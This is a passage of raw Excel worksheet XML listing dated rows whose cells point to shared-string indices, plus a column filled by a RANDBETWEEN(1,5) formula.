        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19877" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A19877" s="1">
        <v>43130.680011574077</v>
      </c>
      <c r="C19877" t="s">
        <v>10</v>
      </c>
      <c r="D19877" t="s">
        <v>39</v>
      </c>
      <c r="E19877" s="2" t="s">
        <v>17847</v>
      </c>
      <c r="F19877">
        <f t="shared" ca="1" si="310"/>
        <v>2</v>
      </c>
    </row>
    <row r="19878" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19878" s="1">
        <v>43130.671678240738</v>
      </c>
      <c r="C19878" t="s">
        <v>7419</v>
      </c>
      <c r="D19878" t="s">
        <v>89</v>
      </c>
      <c r="E19878" s="2" t="s">
        <v>17848</v>
      </c>
      <c r="F19878">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19879" s="1">
        <v>43130.671273148146</v>
      </c>
      <c r="C19879" t="s">
        <v>10</v>
      </c>
      <c r="D19879" t="s">
        <v>336</v>
      </c>
      <c r="E19879" t="s">
        <v>17849</v>
      </c>
      <c r="F19879">
        <f t="shared" ca="1" si="310"/>
        <v>3</v>
      </c>
    </row>
    <row r="19880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19880" s="1">
        <v>43130.669166666667</v>
      </c>
      <c r="C19880" t="s">
        <v>10</v>
      </c>
      <c r="D19880" t="s">
        <v>6</v>
      </c>
      <c r="E19880" t="s">
        <v>17850</v>
      </c>
      <c r="F19880">
        <f t="shared" ca="1" si="310"/>
        <v>4</v>
      </c>
    </row>
    <row r="19881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19881" s="1">
        <v>43130.661874999998</v>
      </c>
      <c r="C19881" t="s">
        <v>10</v>
      </c>
      <c r="D19881" t="s">
        <v>263</v>
      </c>
      <c r="E19881" t="s">
        <v>17851</v>
      </c>
      <c r="F19881">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19882" s="1">
        <v>43130.634942129633</v>
      </c>
      <c r="C19882" t="s">
        <v>10</v>
      </c>
      <c r="D19882" t="s">
        <v>17</v>
      </c>
      <c r="E19882" t="s">
        <v>17852</v>
      </c>
      <c r="F19882">
        <f t="shared" ca="1" si="310"/>
        <v>5</v>
      </c>
    </row>
    <row r="19883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19883" s="1">
        <v>43130.627372685187</v>
      </c>
      <c r="C19883" t="s">
        <v>10</v>
      </c>
      <c r="D19883" t="s">
        <v>89</v>
      </c>
      <c r="E19883" t="s">
        <v>17853</v>
      </c>
      <c r="F19883">
        <f t="shared" ca="1" si="310"/>
        <v>3</v>
      </c>
    </row>
    <row r="19884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19884" s="1">
        <v>43130.599456018521</v>
      </c>
      <c r="C19884" t="s">
        <v>6</v>
      </c>
      <c r="D19884" t="s">
        <v>25</v>
      </c>
      <c r="E19884" t="s">
        <v>17854</v>
      </c>
      <c r="F19884">
        <f t="shared" ca="1" si="310"/>
        <v>3</v>
      </c>
    </row>
    <row r="19885" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19885" s="1">
        <v>43130.595104166663</v>
      </c>
      <c r="C19885" t="s">
        <v>10</v>
      </c>
      <c r="D19885" t="s">
        <v>17</v>
      </c>
      <c r="E19885" s="2" t="s">
        <v>17855</v>
      </c>
      <c r="F19885">
        <f t="shared" ca="1" si="310"/>
        <v>3</v>
      </c>
    </row>
    <row r="19886" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19886" s="1">
        <v>43130.58394675926</v>
      </c>
      <c r="C19886" t="s">
        <v>6</v>
      </c>
      <c r="D19886" t="s">
        <v>25</v>
      </c>
      <c r="E19886" s="2" t="s">
        <v>17856</v>
      </c>
      <c r="F19886">
        <f t="shared" ca="1" si="310"/>
        <v>3</v>
      </c>
    </row>
    <row r="19887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19887" s="1">
        <v>43130.571250000001</v>
      </c>
      <c r="C19887" t="s">
        <v>10</v>
      </c>
      <c r="D19887" t="s">
        <v>632</v>
      </c>
      <c r="E19887" t="s">
        <v>17857</v>
      </c>
      <c r="F19887">
        <f t="shared" ca="1" si="310"/>
        <v>5</v>
      </c>
    </row>
    <row r="19888" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19888" s="1">
        <v>43130.571122685185</v>
      </c>
      <c r="C19888" t="s">
        <v>16</v>
      </c>
      <c r="E19888" s="2" t="s">
        <v>17858</v>
      </c>
      <c r="F19888">
        <f t="shared" ca="1" si="310"/>
        <v>4</v>
      </c>
    </row>
    <row r="19889" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19889" s="1">
        <v>43130.555</v>
      </c>
      <c r="C19889" t="s">
        <v>1130</v>
      </c>
      <c r="D19889" t="s">
        <v>312</v>
      </c>
      <c r="E19889" s="2" t="s">
        <v>17859</v>
      </c>
      <c r="F19889">
        <f t="shared" ca="1" si="310"/>
        <v>4</v>
      </c>
    </row>
    <row r="19890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19890" s="1">
        <v>43130.55265046296</v>
      </c>
      <c r="C19890" t="s">
        <v>6</v>
      </c>
      <c r="D19890" t="s">
        <v>2139</v>
      </c>
      <c r="E19890" t="s">
        <v>17860</v>
      </c>
      <c r="F19890">
        <f t="shared" ca="1" si="310"/>
        <v>4</v>
      </c>
    </row>
    <row r="19891" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19891" s="1">
        <v>43130.538194444445</v>
      </c>
      <c r="C19891" t="s">
        <v>10</v>
      </c>
      <c r="D19891" t="s">
        <v>6</v>
      </c>
      <c r="E19891" t="s">
        <v>17861</v>
      </c>
      <c r="F19891">
        <f t="shared" ca="1" si="310"/>
        <v>3</v>
      </c>
    </row>
    <row r="19892" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19892" s="1">
        <v>43130.527083333334</v>
      </c>
      <c r="C19892" t="s">
        <v>10</v>
      </c>
      <c r="D19892" t="s">
        <v>36</v>
      </c>
      <c r="E19892" s="2" t="s">
        <v>17862</v>
      </c>
      <c r="F19892">
        <f t="shared" ca="1" si="310"/>
        <v>2</v>
      </c>
    </row>
    <row r="19893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19893" s="1">
        <v>43130.511886574073</v>
      </c>
      <c r="C19893" t="s">
        <v>10</v>
      </c>
      <c r="D19893" t="s">
        <v>6</v>
      </c>
      <c r="E19893" t="s">
        <v>17863</v>
      </c>
      <c r="F19893">
        <f t="shared" ca="1" si="310"/>
        <v>5</v>
      </c>
    </row>
    <row r="19894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19894" s="1">
        <v>43130.481539351851</v>
      </c>
      <c r="C19894" t="s">
        <v>197</v>
      </c>
      <c r="E19894" t="s">
        <v>17864</v>
      </c>
      <c r="F19894">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19895" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19895" s="1">
        <v>43130.46769675926</v>
      </c>
      <c r="C19895" t="s">
        <v>6</v>
      </c>
      <c r="D19895" t="s">
        <v>25</v>
      </c>
      <c r="E19895" s="2" t="s">
        <v>17865</v>
      </c>
      <c r="F19895">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19896" s="1">
        <v>43130.427361111113</v>
      </c>
      <c r="C19896" t="s">
        <v>410</v>
      </c>
      <c r="D19896" t="s">
        <v>885</v>
      </c>
      <c r="E19896" t="s">
        <v>17866</v>
      </c>
      <c r="F19896">
        <f t="shared" ca="1" si="310"/>
        <v>5</v>
      </c>
    </row>
    <row r="19897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19897" s="1">
        <v>43130.425659722219</v>
      </c>
      <c r="C19897" t="s">
        <v>10</v>
      </c>
      <c r="D19897" t="s">
        <v>192</v>
      </c>
      <c r="E19897" t="s">
        <v>17867</v>
      </c>
      <c r="F19897">
        <f t="shared" ca="1" si="310"/>
        <v>5</v>
      </c>
    </row>
    <row r="19898" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19898" s="1">
        <v>43130.421284722222</v>
      </c>
      <c r="C19898" t="s">
        <v>10</v>
      </c>
      <c r="D19898" t="s">
        <v>36</v>
      </c>
      <c r="E19898" t="s">
        <v>17868</v>
      </c>
      <c r="F19898">
        <f t="shared" ca="1" si="310"/>
        <v>4</v>
      </c>
    </row>
    <row r="19899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19899" s="1">
        <v>43130.413148148145</v>
      </c>
      <c r="C19899" t="s">
        <v>43</v>
      </c>
      <c r="E19899" t="s">
        <v>17869</v>
      </c>
      <c r="F19899">
        <f t="shared" ca="1" si="310"/>
        <v>5</v>
      </c>
    </row>
    <row r="19900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19900" s="1">
        <v>43130.382106481484</v>
      </c>
      <c r="C19900" t="s">
        <v>318</v>
      </c>
      <c r="E19900" t="s">
        <v>17870</v>
      </c>
      <c r="F19900">
        <f t="shared" ca="1" si="310"/>
        <v>5</v>
      </c>
    </row>
    <row r="19901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19901" s="1">
        <v>43130.37358796296</v>
      </c>
      <c r="C19901" t="s">
        <v>10</v>
      </c>
      <c r="D19901" t="s">
        <v>178</v>
      </c>
      <c r="E19901" t="s">
        <v>17871</v>
      </c>
      <c r="F19901">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19902" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19902" s="1">
        <v>43130.37228009259</v>
      </c>
      <c r="C19902" t="s">
        <v>41</v>
      </c>
      <c r="E19902" s="2" t="s">
        <v>17872</v>
      </c>
      <c r="F19902">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19903" s="1">
        <v>43130.370219907411</v>
      </c>
      <c r="C19903" t="s">
        <v>10</v>
      </c>
      <c r="D19903" t="s">
        <v>36</v>
      </c>
      <c r="E19903" t="s">
        <v>17873</v>
      </c>
      <c r="F19903">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19904" s="1">
        <v>43130.354722222219</v>
      </c>
      <c r="C19904" t="s">
        <v>17</v>
      </c>
      <c r="E19904" t="s">
        <v>17874</v>
      </c>
      <c r="F19904">
        <f t="shared" ca="1" si="310"/>
        <v>2</v>
      </c>
    </row>
    <row r="19905" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A19905" s="1">
        <v>43130.338252314818</v>
      </c>
      <c r="C19905" t="s">
        <v>41</v>
      </c>
      <c r="E19905" s="2" t="s">
        <v>17875</v>
      </c>
      <c r="F19905">
        <f t="shared" ca="1" si="310"/>
        <v>1</v>
      </c>
    </row>
    <row r="19906" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19906" s="1">
        <v>43130.334340277775</v>
      </c>
      <c r="C19906" t="s">
        <v>8440</v>
      </c>
      <c r="E19906" s="2" t="s">
        <v>17876</v>
      </c>
      <c r="F19906">
        <f t="shared" ref="F19906:F19969" ca="1" si="311">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="19907" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19907" s="1">
        <v>43130.333194444444</v>
      </c>
      <c r="C19907" t="s">
        <v>8440</v>
      </c>
      <c r="E19907" s="2" t="s">
        <v>17876</v>
      </c>
      <c r="F19907">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19908" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19908" s="1">
        <v>43130.279895833337</v>
      </c>
      <c r="C19908" t="s">
        <v>1510</v>
      </c>
      <c r="D19908" t="s">
        <v>52</v>
      </c>
      <c r="E19908" s="2" t="s">
        <v>17877</v>
      </c>
      <c r="F19908">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19909" s="1">
        <v>43130.22347222222</v>
      </c>
      <c r="C19909" t="s">
        <v>48</v>
      </c>
      <c r="E19909" t="s">
        <v>17878</v>
      </c>
      <c r="F19909">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19910" s="1">
        <v>43130.204710648148</v>
      </c>
      <c r="C19910" t="s">
        <v>71</v>
      </c>
      <c r="E19910" t="s">
        <v>17879</v>
      </c>
      <c r="F19910">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19911" s="1">
        <v>43130.202268518522</v>
      </c>
      <c r="C19911" t="s">
        <v>41</v>
      </c>
      <c r="E19911" t="s">
        <v>17880</v>
      </c>
      <c r="F19911">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19912" s="1">
        <v>43130.189039351855</v>
      </c>
      <c r="C19912" t="s">
        <v>103</v>
      </c>
      <c r="D19912" t="s">
        <v>312</v>
      </c>
      <c r="E19912" t="s">
        <v>17881</v>
      </c>
      <c r="F19912">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19913" s="1">
        <v>43130.179675925923</v>
      </c>
      <c r="C19913" t="s">
        <v>41</v>
      </c>
      <c r="D19913" t="s">
        <v>312</v>
      </c>
      <c r="E19913" t="s">
        <v>17882</v>
      </c>
      <c r="F19913">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19914" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19914" s="1">
        <v>43130.169317129628</v>
      </c>
      <c r="C19914" t="s">
        <v>71</v>
      </c>
      <c r="E19914" s="2" t="s">
        <v>17883</v>
      </c>
      <c r="F19914">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19915" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19915" s="1">
        <v>43130.115486111114</v>
      </c>
      <c r="C19915" t="s">
        <v>41</v>
      </c>
      <c r="E19915" s="2" t="s">
        <v>17884</v>
      </c>
      <c r="F19915">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19916" s="1">
        <v>43130.102800925924</v>
      </c>
      <c r="C19916" t="s">
        <v>229</v>
      </c>
      <c r="F19916">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19917" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19917" s="1">
        <v>43130.054479166669</v>
      </c>
      <c r="C19917" t="s">
        <v>48</v>
      </c>
      <c r="D19917" t="s">
        <v>312</v>
      </c>
      <c r="E19917" s="2" t="s">
        <v>17885</v>
      </c>
      <c r="F19917">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19918" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19918" s="1">
        <v>43130.052210648151</v>
      </c>
      <c r="C19918" t="s">
        <v>48</v>
      </c>
      <c r="D19918" t="s">
        <v>312</v>
      </c>
      <c r="E19918" s="2" t="s">
        <v>17885</v>
      </c>
      <c r="F19918">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19919" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A19919" s="1">
        <v>43129.983206018522</v>
      </c>
      <c r="C19919" t="s">
        <v>318</v>
      </c>
      <c r="E19919" s="2" t="s">
        <v>17886</v>
      </c>
      <c r="F19919">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19920" s="1">
        <v>43129.969548611109</v>
      </c>
      <c r="C19920" t="s">
        <v>845</v>
      </c>
      <c r="F19920">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19921" s="1">
        <v>43129.895856481482</v>
      </c>
      <c r="C19921" t="s">
        <v>10735</v>
      </c>
      <c r="D19921" t="s">
        <v>41</v>
      </c>
      <c r="E19921" t="s">
        <v>17887</v>
      </c>
      <c r="F19921">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19922" s="1">
        <v>43129.889907407407</v>
      </c>
      <c r="C19922" t="s">
        <v>314</v>
      </c>
      <c r="E19922" t="s">
        <v>17888</v>
      </c>
      <c r="F19922">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19923" s="1">
        <v>43129.878842592596</v>
      </c>
      <c r="C19923" t="s">
        <v>10</v>
      </c>
      <c r="D19923" t="s">
        <v>6</v>
      </c>
      <c r="E19923" t="s">
        <v>17889</v>
      </c>
      <c r="F19923">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19924" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19924" s="1">
        <v>43129.872870370367</v>
      </c>
      <c r="C19924" t="s">
        <v>139</v>
      </c>
      <c r="D19924" t="s">
        <v>312</v>
      </c>
      <c r="E19924" t="s">
        <v>17890</v>
      </c>
      <c r="F19924">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19925" s="1">
        <v>43129.856770833336</v>
      </c>
      <c r="C19925" t="s">
        <v>10</v>
      </c>
      <c r="D19925" t="s">
        <v>1036</v>
      </c>
      <c r="E19925" t="s">
        <v>17891</v>
      </c>
      <c r="F19925">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19926" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19926" s="1">
        <v>43129.794085648151</v>
      </c>
      <c r="C19926" t="s">
        <v>10</v>
      </c>
      <c r="D19926" t="s">
        <v>94</v>
      </c>
      <c r="E19926" s="2" t="s">
        <v>17892</v>
      </c>
      <c r="F19926">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19927" s="1">
        <v>43129.789988425924</v>
      </c>
      <c r="C19927" t="s">
        <v>10</v>
      </c>
      <c r="D19927" t="s">
        <v>23</v>
      </c>
      <c r="E19927" t="s">
        <v>17893</v>
      </c>
      <c r="F19927">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19928" s="1">
        <v>43129.735115740739</v>
      </c>
      <c r="C19928" t="s">
        <v>10</v>
      </c>
      <c r="D19928" t="s">
        <v>6</v>
      </c>
      <c r="E19928" t="s">
        <v>17894</v>
      </c>
      <c r="F19928">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19929" s="1">
        <v>43129.734722222223</v>
      </c>
      <c r="C19929" t="s">
        <v>140</v>
      </c>
      <c r="D19929" t="s">
        <v>141</v>
      </c>
      <c r="E19929" t="s">
        <v>17895</v>
      </c>
      <c r="F19929">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19930" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A19930" s="1">
        <v>43129.728819444441</v>
      </c>
      <c r="C19930" t="s">
        <v>10</v>
      </c>
      <c r="D19930" t="s">
        <v>92</v>
      </c>
      <c r="E19930" s="2" t="s">
        <v>17896</v>
      </c>
      <c r="F19930">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19931" s="1">
        <v>43129.698344907411</v>
      </c>
      <c r="C19931" t="s">
        <v>10</v>
      </c>
      <c r="D19931" t="s">
        <v>222</v>
      </c>
      <c r="E19931" t="s">
        <v>17897</v>
      </c>
      <c r="F19931">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19932" s="1">
        <v>43129.650081018517</v>
      </c>
      <c r="C19932" t="s">
        <v>3515</v>
      </c>
      <c r="E19932" t="s">
        <v>17898</v>
      </c>
      <c r="F19932">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19933" s="1">
        <v>43129.649328703701</v>
      </c>
      <c r="C19933" t="s">
        <v>10</v>
      </c>
      <c r="D19933" t="s">
        <v>80</v>
      </c>
      <c r="E19933" t="s">
        <v>17899</v>
      </c>
      <c r="F19933">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19934" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19934" s="1">
        <v>43129.624189814815</v>
      </c>
      <c r="C19934" t="s">
        <v>260</v>
      </c>
      <c r="D19934" t="s">
        <v>312</v>
      </c>
      <c r="E19934" s="2" t="s">
        <v>17900</v>
      </c>
      <c r="F19934">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19935" s="1">
        <v>43129.622048611112</v>
      </c>
      <c r="C19935" t="s">
        <v>10</v>
      </c>
      <c r="D19935" t="s">
        <v>112</v>
      </c>
      <c r="E19935" t="s">
        <v>17901</v>
      </c>
      <c r="F19935">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19936" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19936" s="1">
        <v>43129.614722222221</v>
      </c>
      <c r="C19936" t="s">
        <v>10</v>
      </c>
      <c r="D19936" t="s">
        <v>1036</v>
      </c>
      <c r="E19936" s="2" t="s">
        <v>17902</v>
      </c>
      <c r="F19936">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19937" s="1">
        <v>43129.601851851854</v>
      </c>
      <c r="C19937" t="s">
        <v>10</v>
      </c>
      <c r="D19937" t="s">
        <v>80</v>
      </c>
      <c r="F19937">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19938" s="1">
        <v>43129.583321759259</v>
      </c>
      <c r="C19938" t="s">
        <v>10</v>
      </c>
      <c r="D19938" t="s">
        <v>86</v>
      </c>
      <c r="E19938" t="s">
        <v>17903</v>
      </c>
      <c r="F19938">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19939" s="1">
        <v>43129.574918981481</v>
      </c>
      <c r="C19939" t="s">
        <v>260</v>
      </c>
      <c r="E19939" t="s">
        <v>17904</v>
      </c>
      <c r="F19939">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19940" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19940" s="1">
        <v>43129.561284722222</v>
      </c>
      <c r="C19940" t="s">
        <v>10</v>
      </c>
      <c r="D19940" t="s">
        <v>374</v>
      </c>
      <c r="E19940" s="2" t="s">
        <v>17905</v>
      </c>
      <c r="F19940">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19941" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19941" s="1">
        <v>43129.557372685187</v>
      </c>
      <c r="C19941" t="s">
        <v>16</v>
      </c>
      <c r="E19941" s="2" t="s">
        <v>17906</v>
      </c>
      <c r="F19941">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19942" s="1">
        <v>43129.547314814816</v>
      </c>
      <c r="C19942" t="s">
        <v>48</v>
      </c>
      <c r="E19942" t="s">
        <v>17907</v>
      </c>
      <c r="F19942">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19943" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19943" s="1">
        <v>43129.541261574072</v>
      </c>
      <c r="C19943" t="s">
        <v>10</v>
      </c>
      <c r="D19943" t="s">
        <v>163</v>
      </c>
      <c r="E19943" s="2" t="s">
        <v>17908</v>
      </c>
      <c r="F19943">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19944" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19944" s="1">
        <v>43129.526770833334</v>
      </c>
      <c r="C19944" t="s">
        <v>48</v>
      </c>
      <c r="E19944" s="2" t="s">
        <v>17909</v>
      </c>
      <c r="F19944">
        <f t="shared" ca="1" si="311"/>
        <v>1</v>
      </c>
    </row>
    <row r="19945" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19945" s="1">
        <v>43129.525671296295</v>
      </c>
      <c r="C19945" t="s">
        <v>10</v>
      </c>
      <c r="D19945" t="s">
        <v>36</v>
      </c>
      <c r="E19945" t="s">
        <v>17910</v>
      </c>
      <c r="F19945">
        <f t="shared" ca="1" si="311"/>
        <v>4</v>
      </c>
    </row>
    <row r="19946" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19946" s="1">
        <v>43129.522858796299</v>
      </c>
      <c r="C19946" t="s">
        <v>43</v>
      </c>
      <c r="E19946" s="2" t="s">
        <v>17911</v>
      </c>
      <c r="F19946">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19947" s="1">
        <v>43129.476064814815</v>
      </c>
      <c r="C19947" t="s">
        <v>10</v>
      </c>
      <c r="D19947" t="s">
        <v>52</v>
      </c>
      <c r="E19947" t="s">
        <v>17912</v>
      </c>
      <c r="F19947">
        <f t="shared" ca="1" si="311"/>
        <v>5</v>
      </c>
    </row>
    <row r="19948" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19948" s="1">
        <v>43129.463576388887</v>
      </c>
      <c r="C19948" t="s">
        <v>17</v>
      </c>
      <c r="E19948" s="2" t="s">
        <v>17913</v>
      </c>
      <c r="F19948">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19949" s="1">
        <v>43129.460914351854</v>
      </c>
      <c r="C19949" t="s">
        <v>10</v>
      </c>
      <c r="D19949" t="s">
        <v>86</v>
      </c>
      <c r="E19949" t="s">
        <v>17914</v>
      </c>
      <c r="F19949">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19950" s="1">
        <v>43129.452476851853</v>
      </c>
      <c r="C19950" t="s">
        <v>10</v>
      </c>
      <c r="D19950" t="s">
        <v>263</v>
      </c>
      <c r="E19950" t="s">
        <v>17915</v>
      </c>
      <c r="F19950">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19951" s="1">
        <v>43129.443969907406</v>
      </c>
      <c r="C19951" t="s">
        <v>10</v>
      </c>
      <c r="D19951" t="s">
        <v>112</v>
      </c>
      <c r="E19951" t="s">
        <v>17916</v>
      </c>
      <c r="F19951">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19952" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A19952" s="1">
        <v>43129.415219907409</v>
      </c>
      <c r="C19952" t="s">
        <v>65</v>
      </c>
      <c r="E19952" s="2" t="s">
        <v>17917</v>
      </c>
      <c r="F19952">
        <f t="shared" ca="1" si="311"/>
        <v>3</v>
      </c>
    </row>
    <row r="19953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19953" s="1">
        <v>43129.401782407411</v>
      </c>
      <c r="C19953" t="s">
        <v>134</v>
      </c>
      <c r="D19953" t="s">
        <v>312</v>
      </c>
      <c r="E19953" t="s">
        <v>17918</v>
      </c>
      <c r="F19953">
        <f t="shared" ca="1" si="311"/>
        <v>2</v>
      </c>
    </row>
    <row r="19954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19954" s="1">
        <v>43129.396724537037</v>
      </c>
      <c r="C19954" t="s">
        <v>6</v>
      </c>
      <c r="D19954" t="s">
        <v>25</v>
      </c>
      <c r="E19954" t="s">
        <v>17919</v>
      </c>
